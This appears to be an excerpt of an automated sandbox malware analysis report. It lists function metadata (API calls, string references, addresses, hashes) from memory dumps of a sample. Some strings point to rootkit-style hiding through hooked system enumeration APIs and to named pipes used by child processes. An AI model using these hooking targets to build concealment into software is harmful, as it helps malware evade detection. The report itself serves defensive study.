Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction ID: e5e224d6babc261c74393206066095f254b5e0cddc1dcea3658c24014c28461c
Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
Instruction Fuzzy Hash: A631907822AA4BA0EA05FF66EC557F96323B7043A4F8C41739419125759F388A7BC350

Function 000001F91B2F6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F91B2F6938
__scrt_acquire_startup_lock.LIBCMT ref: 000001F91B2F698A
_RTC_Initialize.LIBCMT ref: 000001F91B2F69B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F91B2F69DE
__scrt_release_startup_lock.LIBCMT ref: 000001F91B2F6A09

Strings

`dynamic initializer for ', xrefs: 000001F91B2F69C7
`eh vector vbase copy constructor iterator', xrefs: 000001F91B2F69EE
`eh vector copy constructor iterator', xrefs: 000001F91B2F6A3B
scriptor', xrefs: 000001F91B2F6B39, 000001F91B2F6BB2, 000001F91B2F6BEC

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 1aeae8a8433cfaa2caaf70dbc10e228fffb9bb1b2dfa00e2c953a5a9f73f6c56
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: CF81A13160D24386F662BF7594413F962A3EB65BA0F5C493DBB4583796DB38C85EC700

Function 000001F91B356910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F91B356938
__scrt_acquire_startup_lock.LIBCMT ref: 000001F91B35698A
_RTC_Initialize.LIBCMT ref: 000001F91B3569B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F91B3569DE
__scrt_release_startup_lock.LIBCMT ref: 000001F91B356A09

Strings

`dynamic initializer for ', xrefs: 000001F91B3569C7
scriptor', xrefs: 000001F91B356B39, 000001F91B356BB2, 000001F91B356BEC
`eh vector copy constructor iterator', xrefs: 000001F91B356A3B
`eh vector vbase copy constructor iterator', xrefs: 000001F91B3569EE

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
API String ID: 190073905-1786718095
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 2c3affaa97a1980012cff364d1e3f3ea2a776fdc2121df42592993ca4a77dcd1
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: 2481EF7270F64386FA54BF66E4403F962E3AB847B0F5C8034B94583796EB38C967A700

Function 000001F91B32CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001F91B32CE37
FlsGetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE4C
FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE6D
FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CE9A
FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CEAB
FlsSetValue.KERNEL32(?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CEBC
SetLastError.KERNEL32 ref: 000001F91B32CED7
FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF0D
FlsSetValue.KERNEL32(?,?,00000001,000001F91B32ECCC,?,?,?,?,000001F91B32BF9F,?,?,?,?,?,000001F91B327AB0), ref: 000001F91B32CF2C

Part of subcall function 000001F91B32D6CC: HeapAlloc.KERNEL32 ref: 000001F91B32D721

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF54

Part of subcall function 000001F91B32D744: HeapFree.KERNEL32 ref: 000001F91B32D75A
Part of subcall function 000001F91B32D744: GetLastError.KERNEL32 ref: 000001F91B32D764

FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF65
FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001F91B330A6B,?,?,?,000001F91B33045C,?,?,?,000001F91B32C84F), ref: 000001F91B32CF76

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Value$ErrorLast$Heap$AllocFree
String ID:
API String ID: 570795689-0
Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction ID: 781918e1f78d9188d7eb8c586794af5370965203db440fbb91f37b18ea652277
Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
Instruction Fuzzy Hash: 62414F3430F64756FA69BFB556563FD2253AB447F0F6C07B4A836066E6DE2884338200

Function 00007FF7272620F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF72726211B
SelectObject.GDI32 ref: 00007FF727262162
DrawTextW.USER32 ref: 00007FF727262185
SelectObject.GDI32 ref: 00007FF72726219B
ReleaseDC.USER32 ref: 00007FF7272621AB
MoveWindow.USER32 ref: 00007FF7272621FB
MoveWindow.USER32 ref: 00007FF72726223B
MoveWindow.USER32 ref: 00007FF72726228E
MoveWindow.USER32 ref: 00007FF7272622D6

Strings

P%, xrefs: 00007FF72726216F

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: 9cf9bd36a8926795a79f5591b4bce6ee28f81efbdbc79d4c9c34316584ce5468
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: 855107266087A186D6249F22B8181BAF7F1F798B61F444135EBDE83685DF3CD046DB20

Function 00007FF727261050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7272611D0
fseek, xrefs: 00007FF7272610CC
malloc, xrefs: 00007FF7272610FC
fread, xrefs: 00007FF7272611D7
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7272610C5
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7272610F5
Failed to extract %s: failed to open archive file!, xrefs: 00007FF727261097

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 18a8bc01bb379e61637bb3a06a66d93779c183dd83d6a2d2a34fa46513ab6cd6
Instruction ID: 6717cffde8da4e1cb06114ec1e9b1a697f8347ef56d30e7698a4fa5a3dd7b055
Opcode Fuzzy Hash: 18a8bc01bb379e61637bb3a06a66d93779c183dd83d6a2d2a34fa46513ab6cd6
Instruction Fuzzy Hash: 27417E61E0865282EA14BB12AE405B6E3F1FF46BC4F94903ADD4D47B96DF3CF5068B20

Function 000001F91B322244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001F91B322259
GetCurrentProcessId.KERNEL32 ref: 000001F91B322263

Part of subcall function 000001F91B321934: OpenProcess.KERNEL32 ref: 000001F91B321952
Part of subcall function 000001F91B321934: IsWow64Process.KERNEL32 ref: 000001F91B321968
Part of subcall function 000001F91B321934: CloseHandle.KERNEL32 ref: 000001F91B321983

CreateFileW.KERNEL32 ref: 000001F91B3222BC
WriteFile.KERNEL32 ref: 000001F91B3222E4
ReadFile.KERNEL32 ref: 000001F91B322303
CloseHandle.KERNEL32 ref: 000001F91B32230C

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001F91B322293
\\.\pipe\dialerchildproc64, xrefs: 000001F91B32228C

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction ID: 1078222668cbc480c5b0a00a4362b428e62a0ff7fd64350240db004a36731114
Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
Instruction Fuzzy Hash: 5F21323561D64387E7109F25E9443AA73A2F785BA4F580235EA5902AA4CF7CC156CF00

Function 000001F91B2F9944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F91B2F99A1

Part of subcall function 000001F91B2FA814: __GetUnwindTryBlock.LIBCMT ref: 000001F91B2FA857
Part of subcall function 000001F91B2FA814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F91B2FA87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F91B2F9A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F91B2F9CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F91B2F9DDA

Strings

csm, xrefs: 000001F91B2F99BB
csm, xrefs: 000001F91B2F9A9C
csm, xrefs: 000001F91B2F9A22

Memory Dump Source

Source File: 00000002.00000002.2420950138.000001F91B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B2F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b2f0000_based.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 59f83508780dbde94a4b707c350676a79b104be26223aee3752673fbadbc8519
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 22E18F726087438AFB60AF65D4403ED77A2F7697A8F180939EF4957B99CB34C499CB00

Function 000001F91B32A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F91B32A5A1

Part of subcall function 000001F91B32B414: __GetUnwindTryBlock.LIBCMT ref: 000001F91B32B457
Part of subcall function 000001F91B32B414: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F91B32B47C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F91B32A679
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F91B32A8CE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F91B32A9DA

Strings

csm, xrefs: 000001F91B32A5BB
csm, xrefs: 000001F91B32A69C
csm, xrefs: 000001F91B32A622

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction ID: 0ce0ca53f7dee72d9348c0305a4b8004eebc76af930ff28b00810a6a85fcdcda
Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
Instruction Fuzzy Hash: 2EE1807260A7478AEB20AF65D4413ED77A2F749BE8F180175EE8957B95CB34D0A3C700

Function 000001F91B359944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001F91B3599A1

Part of subcall function 000001F91B35A814: __GetUnwindTryBlock.LIBCMT ref: 000001F91B35A857
Part of subcall function 000001F91B35A814: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001F91B35A87C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001F91B359A79
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001F91B359CCE
std::bad_alloc::bad_alloc.LIBCMT ref: 000001F91B359DDA

Strings

csm, xrefs: 000001F91B3599BB
csm, xrefs: 000001F91B359A22
csm, xrefs: 000001F91B359A9C

Memory Dump Source

Source File: 00000002.00000002.2421140533.000001F91B350000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F91B350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b350000_based.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction ID: 487812e8f4f214aa6077bbf880215ca06265161a1b7204dbf3dafa236b89e688
Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
Instruction Fuzzy Hash: 85E1A37260A7838AEB60EF65D4403ED77E6F7467A8F180235EE8957B95CB34C4A6C700

Function 00007FF72726DD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF72726DD85

Part of subcall function 00007FF72726ECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF72726ED1F
Part of subcall function 00007FF72726ECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF72726ED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF72726DE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF72726E0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF72726E1B8

Strings

csm, xrefs: 00007FF72726DD9F
csm, xrefs: 00007FF72726DE80
csm, xrefs: 00007FF72726DE06

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: 1ffebac7ac7ef5d3bab7c146ae6a19ff31e54a44505e9b0358cf0137de9e05c8
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: D8D1A572E0878586EB20AB25D9403ADB7F0FB46788F50913ADE4D57799CF38E492CB10

Function 000001F91B32F394 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 000001F91B32F510
GetProcAddress.KERNEL32 ref: 000001F91B32F51C

Strings

api-ms-, xrefs: 000001F91B32F45A
ext-ms-, xrefs: 000001F91B32F46D

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction ID: 753263736e04175eec62941f6124b374bf5f2a2560a35fcdd370282be96516b6
Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
Instruction Fuzzy Hash: 1641B03235AA0381EE56FF16A8507FA6393BB49BF0F1D42359D0987794EA38C4678300

Function 000001F91B32104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001F91B3210B1
RegEnumValueW.ADVAPI32 ref: 000001F91B321117
GetProcessHeap.KERNEL32 ref: 000001F91B32115A
HeapAlloc.KERNEL32 ref: 000001F91B321168
GetProcessHeap.KERNEL32 ref: 000001F91B321185
HeapFree.KERNEL32 ref: 000001F91B321193

Strings

d, xrefs: 000001F91B3210D6

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction ID: 9bf9351de066f14a7859a37c54e4add3c11ba636ca2b23690ff6006528f05479
Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
Instruction Fuzzy Hash: 70417437619B86CAE760DF22E5443AE77A2F388B98F048135DA8907758DF3CD556CB00

Function 000001F91B32D068 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D087
FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0A6
FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0CE
FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0DF
FlsSetValue.KERNEL32(?,?,?,000001F91B32C7DE,?,?,?,?,?,?,?,?,000001F91B32CF9D,?,?,00000001), ref: 000001F91B32D0F0

Strings

Y%, xrefs: 000001F91B32D0A6
1%, xrefs: 000001F91B32D0CE

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Value
String ID: 1%$Y%
API String ID: 3702945584-1395475152
Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction ID: 0efd72f370d162097aacfc4428c3469f8ef49a7a15edaee114d3e810fdb8b60c
Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
Instruction Fuzzy Hash: 1211513070E64741FA697F265A5A3FD6243AB447F0F1C43B4983906AEADE28D4238600

Function 000001F91B327510 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001F91B327538
__scrt_acquire_startup_lock.LIBCMT ref: 000001F91B32758A
_RTC_Initialize.LIBCMT ref: 000001F91B3275B8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001F91B3275DE
__scrt_release_startup_lock.LIBCMT ref: 000001F91B327609

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: 697c5e0ebdf10a1d9ce51cc9d071498c74b9c2b55d706911d7ffe83734e09ff1
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: D8815935A0F643CAFA52BF2AD4413FD6692BB45BE0F5C44B5A904477A6EB38CC678700

Function 000001F91B329DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001F91B329E49
GetLastError.KERNEL32 ref: 000001F91B329E57
LoadLibraryExW.KERNEL32 ref: 000001F91B329E81
FreeLibrary.KERNEL32 ref: 000001F91B329EC7
GetProcAddress.KERNEL32 ref: 000001F91B329ED3

Strings

api-ms-, xrefs: 000001F91B329E69

Memory Dump Source

Source File: 00000002.00000002.2421007751.000001F91B320000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F91B320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1f91b320000_based.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 3cb1725aba75d0ed373d3c7af76e7a4e97cc097ee3e52c08f409f86fafcd2fb8
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 0B31A23131BA43E5EE26AF4AA8007FD6296BB48BF0F5D46759D1D4B7A0DF39C4668300

Function 00007FF72726CFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D06D
GetLastError.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D0A5
FreeLibrary.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D113
GetProcAddress.KERNEL32(?,?,?,00007FF72726D29A,?,?,?,00007FF72726CF8C,?,?,?,00007FF72726CB89), ref: 00007FF72726D11F

Strings

api-ms-, xrefs: 00007FF72726D08D

Memory Dump Source

Source File: 00000002.00000002.2421531478.00007FF727261000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF727260000, based on PE: true

Associated: 00000002.00000002.2421487487.00007FF727260000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421634004.00007FF72728B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF72729E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421682206.00007FF7272A4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.2421804168.00007FF7272A6000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff727260000_based.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: f9e53f16e269562afa3f5040887d718a57797b61f128ee7ca787cd0e7db7c4c3
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 1031C821A1A646C1EE11BB13AE00575A3F4FF06B60F99853ADD1D47384EF3DE4478B20

Function 000001F91B333DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001F91B333DE5
GetLastError.KERNEL32 ref: 000001F91B333DF1
CloseHandle.KERNEL32 ref: 000001F91B333E09
CreateFileW.KERNEL32 ref: 000001F91B333E34
WriteConsoleW.KERNEL32 ref: 000001F91B333E53

Strings

CONOUT$, xrefs: 000001F91B333E15

Memory Dump Source

